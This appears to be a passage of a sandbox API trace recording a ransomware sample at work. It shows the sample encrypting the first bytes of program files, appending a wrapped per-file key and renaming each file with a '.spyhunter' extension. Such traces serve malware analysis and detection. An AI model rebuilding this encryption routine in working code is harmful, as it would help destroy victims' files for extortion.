[0114.112] GetProcessHeap () returned 0x2c0000 [0114.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.112] GetProcessHeap () returned 0x2c0000 [0114.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e52e60 | out: hHeap=0x2c0000) returned 1 [0114.112] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa00 | out: pbBuffer=0x25cfa00) returned 1 [0114.117] GetProcessHeap () returned 0x2c0000 [0114.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9f8*=0x30) returned 1 [0114.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_blue_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_blue_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.119] GetProcessHeap () returned 0x2c0000 [0114.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.119] GetProcessHeap () returned 0x2c0000 [0114.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e52c60 | out: hHeap=0x2c0000) returned 1 [0114.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9f8 | out: pbBuffer=0x25cf9f8) returned 1 [0114.119] GetProcessHeap () returned 0x2c0000 [0114.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9f0*=0x30) returned 1 [0114.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0114.146] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini") returned 67 [0114.146] StrStrW (lpFirst="AGMGPUOptIn.ini", lpSrch=".txt") returned 0x0 [0114.146] GetProcessHeap () returned 0x2c0000 [0114.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.146] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf9b4*=0x6bf, lpOverlapped=0x0) returned 1 [0114.170] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff941, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.170] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x6bf, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf9b4*=0x6bf, lpOverlapped=0x0) returned 1 [0114.170] GetProcessHeap () returned 0x2c0000 [0114.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.170] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.170] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf9f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf9f4*, lpNumberOfBytesWritten=0x25cf9b4*=0x4, lpOverlapped=0x0) returned 1 [0114.170] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf9b4*=0x30, lpOverlapped=0x0) returned 1 [0114.171] CloseHandle (hObject=0x16c) returned 1 [0114.171] GetProcessHeap () returned 0x2c0000 [0114.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.171] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini.spyhunter") returned 77 [0114.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGMGPUOptIn.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agmgpuoptin.ini.spyhunter")) returned 1 [0114.172] GetProcessHeap () returned 0x2c0000 [0114.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.172] GetProcessHeap () returned 0x2c0000 [0114.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.172] GetProcessHeap () returned 0x2c0000 [0114.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d03580 | out: hHeap=0x2c0000) returned 1 [0114.176] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9f8 | out: pbBuffer=0x25cf9f8) returned 1 [0114.176] GetProcessHeap () returned 0x2c0000 [0114.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.176] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9f0*=0x30) returned 1 [0114.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0114.187] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll") returned 64 [0114.187] StrStrW (lpFirst="BIBUtils.dll", lpSrch=".txt") returned 0x0 [0114.187] GetProcessHeap () returned 0x2c0000 [0114.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.187] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cf9b4*=0x2800, lpOverlapped=0x0) returned 1 [0114.212] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.212] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cf9b4*=0x2800, lpOverlapped=0x0) returned 1 [0114.212] GetProcessHeap () returned 0x2c0000 [0114.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.212] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.212] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf9f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf9f4*, lpNumberOfBytesWritten=0x25cf9b4*=0x4, lpOverlapped=0x0) returned 1 [0114.238] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf9b4*=0x30, lpOverlapped=0x0) returned 1 [0114.238] CloseHandle (hObject=0x16c) returned 1 [0114.238] GetProcessHeap () returned 0x2c0000 [0114.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.239] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll.spyhunter") returned 74 [0114.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\BIBUtils.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\bibutils.dll.spyhunter")) returned 1 [0114.240] GetProcessHeap () returned 0x2c0000 [0114.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.240] GetProcessHeap () returned 0x2c0000 [0114.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.240] GetProcessHeap () returned 0x2c0000 [0114.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e02088 | out: hHeap=0x2c0000) returned 1 [0114.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9f0 | out: pbBuffer=0x25cf9f0) returned 1 [0114.240] GetProcessHeap () returned 0x2c0000 [0114.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9e8*=0x30) returned 1 [0114.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0114.279] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll") returned 63 [0114.279] StrStrW (lpFirst="icudt40.dll", lpSrch=".txt") returned 0x0 [0114.279] GetProcessHeap () returned 0x2c0000 [0114.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.279] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf9ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.327] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.327] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf9ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.328] GetProcessHeap () returned 0x2c0000 [0114.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.328] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.328] WriteFile (in: hFile=0x16c, lpBuffer=0x25cf9ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf9ec*, lpNumberOfBytesWritten=0x25cf9ac*=0x4, lpOverlapped=0x0) returned 1 [0114.329] WriteFile (in: hFile=0x16c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf9ac*=0x30, lpOverlapped=0x0) returned 1 [0114.329] CloseHandle (hObject=0x16c) returned 1 [0114.329] GetProcessHeap () returned 0x2c0000 [0114.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.329] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll.spyhunter") returned 73 [0114.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll.spyhunter")) returned 1 [0114.330] GetProcessHeap () returned 0x2c0000 [0114.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.330] GetProcessHeap () returned 0x2c0000 [0114.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.331] GetProcessHeap () returned 0x2c0000 [0114.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf240 | out: hHeap=0x2c0000) returned 1 [0114.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9f0 | out: pbBuffer=0x25cf9f0) returned 1 [0114.331] GetProcessHeap () returned 0x2c0000 [0114.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9e8*=0x30) returned 1 [0114.331] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.338] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll") returned 63 [0114.338] StrStrW (lpFirst="JP2KLib.dll", lpSrch=".txt") returned 0x0 [0114.338] GetProcessHeap () returned 0x2c0000 [0114.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.338] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf9ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.374] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.374] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf9ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.375] GetProcessHeap () returned 0x2c0000 [0114.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.377] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.377] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf9ec*, lpNumberOfBytesWritten=0x25cf9ac*=0x4, lpOverlapped=0x0) returned 1 [0114.430] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf9ac*=0x30, lpOverlapped=0x0) returned 1 [0114.430] CloseHandle (hObject=0xf4) returned 1 [0114.430] GetProcessHeap () returned 0x2c0000 [0114.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.430] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll.spyhunter") returned 73 [0114.430] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll.spyhunter")) returned 1 [0114.431] GetProcessHeap () returned 0x2c0000 [0114.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.431] GetProcessHeap () returned 0x2c0000 [0114.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.431] GetProcessHeap () returned 0x2c0000 [0114.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0114.437] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9e8 | out: pbBuffer=0x25cf9e8) returned 1 [0114.437] GetProcessHeap () returned 0x2c0000 [0114.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.437] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9e0*=0x30) returned 1 [0114.437] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html") returned 74 [0114.438] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.438] GetProcessHeap () returned 0x2c0000 [0114.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.438] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf9a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf9a4*=0x2800, lpOverlapped=0x0) returned 1 [0114.557] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.557] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf9a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf9a4*=0x2800, lpOverlapped=0x0) returned 1 [0114.557] GetProcessHeap () returned 0x2c0000 [0114.557] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.557] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.557] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf9a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf9e4*, lpNumberOfBytesWritten=0x25cf9a4*=0x4, lpOverlapped=0x0) returned 1 [0114.705] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf9a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf9a4*=0x30, lpOverlapped=0x0) returned 1 [0114.705] CloseHandle (hObject=0xf4) returned 1 [0114.706] GetProcessHeap () returned 0x2c0000 [0114.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.706] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html.spyhunter") returned 84 [0114.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html.spyhunter")) returned 1 [0114.708] GetProcessHeap () returned 0x2c0000 [0114.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.708] GetProcessHeap () returned 0x2c0000 [0114.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0114.708] GetProcessHeap () returned 0x2c0000 [0114.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e36600 | out: hHeap=0x2c0000) returned 1 [0114.708] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf9e0 | out: pbBuffer=0x25cf9e0) returned 1 [0114.708] GetProcessHeap () returned 0x2c0000 [0114.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0114.708] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf9d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf9d8*=0x30) returned 1 [0114.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0114.709] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini") returned 70 [0114.709] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.709] GetProcessHeap () returned 0x2c0000 [0114.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0114.709] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf99c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf99c*=0x298, lpOverlapped=0x0) returned 1 [0114.710] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffd68, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.710] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x25cf99c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf99c*=0x298, lpOverlapped=0x0) returned 1 [0114.710] GetProcessHeap () returned 0x2c0000 [0114.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0114.710] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.711] WriteFile (in: hFile=0xf4, lpBuffer=0x25cf9dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf99c, lpOverlapped=0x0 | out: lpBuffer=0x25cf9dc*, lpNumberOfBytesWritten=0x25cf99c*=0x4, lpOverlapped=0x0) returned 1 [0114.711] WriteFile (in: hFile=0xf4, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf99c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf99c*=0x30, lpOverlapped=0x0) returned 1 [0114.711] CloseHandle (hObject=0xf4) returned 1 [0114.711] GetProcessHeap () returned 0x2c0000 [0114.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.711] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini.spyhunter") returned 80 [0114.711] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\eula.ini.spyhunter")) returned 1 [0114.765] GetProcessHeap () returned 0x2c0000 [0114.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.765] GetProcessHeap () returned 0x2c0000 [0114.765] HeapFree (in: hHeap=0x2c0000, 